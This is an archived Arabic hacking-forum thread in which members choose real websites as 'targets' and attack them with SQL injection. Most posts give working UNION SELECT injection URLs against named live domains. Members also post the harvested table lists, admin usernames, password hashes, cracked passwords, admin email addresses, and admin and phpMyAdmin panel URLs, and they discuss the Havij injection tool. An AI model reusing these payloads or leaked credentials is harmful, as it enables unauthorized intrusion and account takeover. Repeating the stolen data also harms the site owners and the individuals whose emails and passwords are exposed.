:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/t33334.html)

عبد الله ر 08-05-2010 09:35 PM

اقتباس:

إجابة كاملة و موفقة

هاته هي الحقنة المثالية

بارك الله فيك

أعجبكم الهدف ؟؟؟ لوول

الله يسلمك اخي العزيز Syst3m-32

اي والله اعجبني هالموقع (كتر منن)هههههه
مشكور

darkman.dz 08-05-2010 09:52 PM

خرجت خارجا ل 3 ساعات ويبدو أنه فاتني الكثير من التشويق

darkman.dz 08-05-2010 10:16 PM

الحقنة الكاملة + id
ههههههههههههههههههههه
للتأكد فقط
كود:

http://www.marmoon.com/pregames.php?id=-383 UNION SELECT 1,2,3,group_concat(id,0x3a,admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin--
وهاته الجداول التي وجدتها
كود:

ps_customer:passwd:cartnana
ps_customer:last_passwd_gen:cartnana
ps_employee:passwd:cartnana
ps_employee:last_passwd_gen:cartnana
ps_referrer:passwd:cartnana
admin:pass:marmoon
pm_config:mail_pass:melody16
pm_users:password:melody16
pm_users:new_password:melody16
wp_posts:post_password:nananature
wp_users:user_pass:nananature

وهذا العمود الذي طبقت عليه + الأعمدة التي فيه
كود:

************************
 ** admin:pass:marmoon **
 ************************
 admin:id:marmoon
 admin:admin:marmoon
 admin:pass:marmoon

وهذا الناتج الأخير
id= 1
admin = admin
pass=asdfgh

وننتظر الهدف الجديد

darkman.dz 08-05-2010 10:32 PM

d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:

concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:

concat_ws(0x3a,id,user,parola)
وشكرا مقدما

عبد الله ر 08-05-2010 11:12 PM

الله يعطيك العافية اخي ooooo_darkman_ooooo
على الحقنة
انا حاولت اخذ بيانات الأعضاء والايميلات وكانت النتيجة كالتالي:
اولا:
من الجدول pm_users:password:melody16
مع اضافة السيجما الى الاستغلال
الأعمدة:
pm_users:id:melody16
pm_users:username:melody16
pm_users:password:melody16
pm_users:name:melody16
pm_users:gender:melody16
pm_users:country:melody16
pm_users:reg_ip:melody16
pm_users:reg_date:melody16
pm_users:last_signin:melody16
pm_users:email:melody16
pm_users:favorite:melody16
pm_users:power:melody16
pm_users:about:melody16
pm_users:av

الحقنة: http://www.marmoon.com/pregames.php?id=-38 union select 1,2,3,group_concat(id,0x3a,username,0x3a,password, 0x3a,email),5,6,7,8,9,10,11,12,13+from+melody16.pm _users--

وجدت عضوين في هذا الجدول (الغريب ان احدهما اسمه ادمن)!!
البيانات
الاول:
admin
91477f9990ca6e6727c3961b0f1ed7ec
your@email.com
binary98 كلمة السر بعد فك التشفير

الثاني: ( بات مان ) هههه
batman99
d8578edf8458ce06fbc5bb76a58c5ca4
emark.s@gmail.com
qwerty كلمة السر بعد فك التشفير
جربت فوت على الايميل بس مو نفس كلة السر
______________________
ثانبا:
من الجدول:wp_users:user_pass:nananature
من وضع السيجما في الرابط
الأعمدة:
wp_users:ID:nananature
wp_users:user_login:nananature
wp_users:user_pass:nananature
wp_users:user_nicename:nananature
wp_users:user_email:nananature
wp_users:user_url:nananature
wp_users:user_registered:nananature
wp_users:user_activation_key:nananature
wp_users:user_status:nananature
wp_users:display_name:nananature
wp_users:ID:wpdrama,wp

الحقنة: http://www.marmoon.com/pregames.php?...ure.wp_users--

وجدت عضو واحد في الجدول وكمان اسمه ادمن!!!
البيانات:
admin
$P$B8ky.p7DHHXJj3UvebuboIyKiJ9IyS. اطن sh1
admin@nana-nature.com

اخيرا
لوحة التحكم
http://www.marmoon.com/admin
بس ما قبلت بيانات الادمن
(ياشباب والله بدنا حل لهذه المشكلة يعني صرت جايب ادمن كذا..... موقع بس ما يقبل يدخل لوحة الادارة بس الاعضاء بيدخلو معي للموقع وما بستفاد شي هههه)


بدي اعرف يعني كم ادمن في الموقع صارو 3... :a02:
والخير لقدام هههه
الله يعطيك العافية اخي والاخوة جميعهم.
smilies14

Master vbspiders 08-05-2010 11:17 PM

[align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311
هذا اعتقد راح يكون ممل شوي لذلك راح اضيف هدف ثاني معاه للي ما قدر يحقن الاول يحقن الثاني
الهدف الثاني : http://www.vfs.com/news.php?id=7&news_id=362
بالتوفيق
تحياتي


[/align]

darkman.dz 08-05-2010 11:19 PM

عبد الله ر
يعطيك الصحة أخي العزيز
جاري تقييمك على العمل اللذي تقوم به

darkman.dz 08-05-2010 11:20 PM

Master vbspiders
جاري بعد العودة في الليل بإذن الله

TIKTAKram 08-06-2010 12:17 AM

[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

m0h@med 08-06-2010 02:15 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 187851)
d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:

concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:

concat_ws(0x3a,id,user,parola)
وشكرا مقدما

السلام عليكم أخي darkman
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا
exemple
concat(id,0x3a,passs)
resultat
admin:admin
mais si vous ajoutez 0x3a3a
concat(id,0x3a3a,passs)
resultat
admin::admin

بخصوص الاستعلام
concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية
c'est t-a dire
concat_ws(0x3a,id,user,parola)
هي نفسها
concat(id,0x3a,user,0x3a,parola)

الى الأمام دائما....^_^

Master vbspiders 08-06-2010 03:58 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 187927)
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]


[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن...
+
بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة
تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة
تحياتي

[/align]

CODE3 08-06-2010 04:11 PM

هذا أجمل شئ سمعته هذا اليوم.

darkman.dz 08-06-2010 05:16 PM

m0h@med شكرا أخي m0h@med على التوضيح
و الله أفدتني بخصوص concat_ws كثيرا
وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a

darkman.dz 08-06-2010 05:19 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 187927)
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

هل حقنت الموقع الأول ب havij أخي system-32

darkman.dz 08-06-2010 05:21 PM

الهدف الجديد


كود:

www.imagesfestival.com

darkman.dz 08-06-2010 05:30 PM

تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
smilies12
:a04:





TIKTAKram 08-06-2010 05:56 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 188441)
الهدف الجديد


كود:

www.imagesfestival.com


أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟

لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى

إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه

ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL

لكن لما نكون حقناه نعطيه الحل و يستفيد

darkman.dz 08-06-2010 06:22 PM

حقنتو يا غالي Syst3m-32
ويدويا

عبد الله ر 08-06-2010 07:10 PM

اقتباس:

تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
http://www.vbspiders.com/vb/images/s...20%2823%29.gif
:a04:

مشكور اخي العزيز ooooo_darkman_ooooo
ولو هذا واجبنا
بالنسبة للموقع : www.imagesfestival.com
والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه
بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول
مشكور على التقييم

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور

TIKTAKram 08-06-2010 07:17 PM

يا دارك لوول ليش ما قلت لي أنه WordPress ؟؟؟

جعلتني أظهر كأنني لم أستطع حقن الموقع لوول

تم الحقن بنجاح بعد معرفة السكربت WordPress لوول

إسم الجدول : wp_users

إسم عمود اليوزر : user_login

إسم عمود الباسوارد : user_pass

يوزر الأدمن : admin

باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1

بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress

و هذه الحقنة كاملة :

كود:

http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users--
بالنسبة للوحة التحكم لو تتذكر يا دارك يا مشاكس كم حكينا عنها لوول تظهر لك أني نسيت الموقع ؟؟ هههه

بالتوفيق

darkman.dz 08-06-2010 07:21 PM

system-32
هههههههههههههههههههههههههههههههههههههه
الحمد لله أنك قمت بالتذكر
هههههههههههههههههههههههه
عندي 1 ساعة و أنا أنتظر تقولهالي
ههههههههههههههههههههههههههههههه
لكن في النهاية قمت بالمطلوب يا خبير
تستاهل تكون مشرف
ههههههههههههههههههههه
واصل العمل
+ عمل ممتاز
+ أنا حقنت الموقع لكن و الله ما عرفت أنو مركب سكربت wordpress
ههههههههههههههه
لكني حقنته
من الخبير الآن
هههههههههههههههههههههههههههههه

TIKTAKram 08-06-2010 07:21 PM

اقتباس:

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور

أهلا أخي الكريم

بصراحة و الله العظيم أنا لا أعمل ببرامج الحقن

أعتمد بنسبة 90% على الحقن اليدوي

فقط في بعض الحالات أين يصعب الحقن اليدوي و ما يقارب 10%

بالنسبة للبرنامج الذي أعمل به هو : Havij 1.10

برنامج قوي الأكثر شهرة في هذا المجال و بصراحة من جهتي هو برنامج قوي جدا و رائع

إلى أن في بعض الحالات الحقن اليدوي يغلبه كالحالة التي قبل هذه المشاركة بالضبط

و أي مساعدة أنا هنا

بالتوفيق

darkman.dz 08-06-2010 07:25 PM

Syst3m-32
=============
هل عرفت أن السكربت وورد بريس من إسم الجدول أم ماذا ؟؟؟؟؟؟؟؟

darkman.dz 08-06-2010 07:28 PM

أخي system-32
لاحظ حقنة المحترفين وقولي ماهو الشيئ المضاف على حقنتك من حيث ناتج الإستعلامات
ههههههههههههههههههههههههههههه
كود:

http://www.imagesfestival.com/call.php?id=-8%20union%20select%201,2,3,4,5,6,7,8,concat%28user_login,0x3a,0x3a,user_pass%29,10,11%20from%20wp_users--

عبد الله ر 08-06-2010 07:33 PM

اسف يا شباب والله انا جربت اسم الجدول wp_users من الاول بس باظاهر اني كنت مخطئ خطئ صغير داخل استعلام الـ union select
بعد ما رجعت للهيستوري لقيت حالي مخربط بكتابة احد الفواصل
اسف جدا
جاري متابعة التخمين

darkman.dz 08-06-2010 07:36 PM

بالنسبة للموقع الجديد
هذا هو
وهو مصاب بثغرة سيكول
و أنا جبت رابط لوحة التحكم
و اليوزر و الباس
وهو موقع صيني
هههههههههههههههههههههههههه
خلينا ننوع شوية السلعة
ههههههههههههههههههههههههههههههه
وهو مهدى للإخوة اللي قيمتهم قبيلة في التقييم نتاعهم
كود:

www.phpaa.cn

darkman.dz 08-06-2010 07:38 PM

لا بأس أخي عبد الله ر
سيب راحتك

TIKTAKram 08-06-2010 07:39 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 188522)
أخي system-32
لاحظ حقنة المحترفين وقولي ماهو الشيئ المضاف على حقنتك من حيث ناتج الإستعلامات
ههههههههههههههههههههههههههههه
كود:

http://www.imagesfestival.com/call.php?id=-8%20union%20select%201,2,3,4,5,6,7,8,concat%28user_login,0x3a,0x3a,user_pass%29,10,11%20from%20wp_users--

حقنة محترفين ؟؟؟ آسف أخي و لكنك مخطئ بهذه الكلمة

الفرق الوحيد بين حقنتي و حقنتك حبيبي هو أنك أنت ذهبت إلى ملف مصاب إسمه ( call.php ) و أنا ذهبت إلى ملف مصاب آخر إسمه ( volunteer.php ) و المتغير هو نفسه

بالتوفيق

عبد الله ر 08-06-2010 07:50 PM

انا لاحظت من حقنتك انك استعملت ملف call.php في الحقنة الذي به 11 عمود مصاب
بس عند ملف اخر مثل volunteer.php في الحقن الذي به 8 عمدو مصاب
لم تطهر بقية البيانات
طيب ليش !!!

TIKTAKram 08-06-2010 07:52 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الله ر (المشاركة 188546)
انا لاحظت من حقنتك انك استعملت ملف call.php في الحقنة الذي به 11 عمود مصاب
بس عند ملف اخر مثل volunteer.php في الحقن الذي به 8 عمدو مصاب
لم تطهر بقية البيانات
طيب ليش !!!

هههه يا غالي أنت أجبت نفسك لوول

لأنو هو إستعمل ملف و أنا ملف

darkman.dz 08-06-2010 07:53 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 188532)
حقنة محترفين ؟؟؟ آسف أخي و لكنك مخطئ بهذه الكلمة

الفرق الوحيد بين حقنتي و حقنتك حبيبي هو أنك أنت ذهبت إلى متغير مصاب ( call.php ) و أنا ذهبت إلى متغير مصاب آخر ( volunteer.php )

بالتوفيق

smilies15
ههههههههههههههههههههههههههههههههههههههههههههههههه
كما توقعت تماما
علمت أنك ستقول هذا
هههههههههههههههههههههههه :666:
أنا جربت على عدة ملفات مصابة
عندما كان الموقع مصاب حقا
يعني عيان
الآن قامو بتطويره و غيرو الخلفية وقامو بغلق الثغرات ربما
لأن الموقع لا يتغير مساره في عنوان الموقع في المتصفح
عند التصفح
وهاته الميزة لم تكن عندما حقنت الموقع أول مرة smilies7

شكرا خويا system-32

darkman.dz 08-06-2010 07:55 PM

هل من جديد حول الهدف الصيني
لأنو الظاهر أنو طارت السيكول من راسي
هههههههههههههههههههههههههههههههههههه

عبد الله ر 08-06-2010 07:55 PM

هذا الشي له معنى وهو :
عند حقن الاصدار الرابع عليك بتجربة اكثر من ملف اثناء المحاولة لاستخراج بقية البيانات .
شكرا لك اخي ooooo_darkman_ooooo على هذه المعلومة
اللي حاولت توصلنا اياها بشكل غير مباشر هههه.

darkman.dz 08-06-2010 08:05 PM

أخ عبد الله ر
أنا وجدت هذا الشيئ تقريبا مع كل المواقع اللي حقنتها
و كل ملف يعطيك عدد أعمدة مختلف ...........إلخ
و أنت تعرف الباقي
و العلم لله

TIKTAKram 08-06-2010 08:10 PM

المهم ...! بالنسبة للموقع الصيني

جاري الحقن

لكن ليش تحب تتعبنا ؟؟؟ لازم أستهدفه لأنك لم تضع الملف المصاب :(

المهم جاري تحميل البرنامج و كشف الملف المصاب

و أي شرح أنا هنا لوول

بالتوفيق

darkman.dz 08-06-2010 08:25 PM

حبيت نزيدو شوية في ال level خويا system-32
لأننا في نفس الروتين ملي بدا هذا الموضوع
لازم كل 2 أو 3 أيام نزيدو ال level
ههههههههههههههههههههههههههههههههههههههه

عبد الله ر 08-06-2010 08:27 PM

اقتباس:

المهم ...! بالنسبة للموقع الصيني

جاري الحقن

لكن ليش تحب تتعبنا ؟؟؟ لازم أستهدفه لأنك لم تضع الملف المصاب :(

المهم جاري تحميل البرنامج و كشف الملف المصاب

و أي شرح أنا هنا لوول

بالتوفيق


قصدك اي برنامج
معلش ح نتعبك معنا شوي هههههههه
ان شاء الله قريبا جدا سوف اضع لكم هدف جديد بس حيكون سهل بإذن الله ههه

TIKTAKram 08-06-2010 08:40 PM

لا ما نريد السهل لوول

أنا أنتظر لما تكملوا أضع لكم موقع شيب الرأس يظهر ( أمزح هه )

المهم...! بالنسبة للبرنامج

يا غالي هذا البرنامج يقوم بفحص الموقع و يستخرج لك كل ملفاته و منه أنت و شطارتك في إكتشاف الملف المصاب

و الجميل في البرنامج أنه يضع لك المتغيرات أيضا يعني فقط تضغط ( فتح بالمتصفح )

إن لم تفهمني وعد مني راح أضع شرح عنه في القريب العاجل فيديو

بالتوفيق

darkman.dz 08-06-2010 08:46 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 188583)
لا ما نريد السهل لوول

أنا أنتظر لما تكملوا أضع لكم موقع شيب الرأس يظهر ( أمزح هه )

المهم...! بالنسبة للبرنامج

يا غالي هذا البرنامج يقوم بفحص الموقع و يستخرج لك كل ملفاته و منه أنت و شطارتك في إكتشاف الملف المصاب

و الجميل في البرنامج أنه يضع لك المتغيرات أيضا يعني فقط تضغط ( فتح بالمتصفح )

إن لم تفهمني وعد مني راح أضع شرح عنه في القريب العاجل فيديو

بالتوفيق

ربما أسبقك أخي system-32
ههههههههههههههههههههههههههههههههههههههه
:37:

TIKTAKram 08-06-2010 09:05 PM

آسف أخي و الله لم أبدأ بعد

أولا بسبب النت الثقيلة و ثانيا عندي هاشات أفكها

فقط دقائق و أكون معكم


الساعة الآن 10:53 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0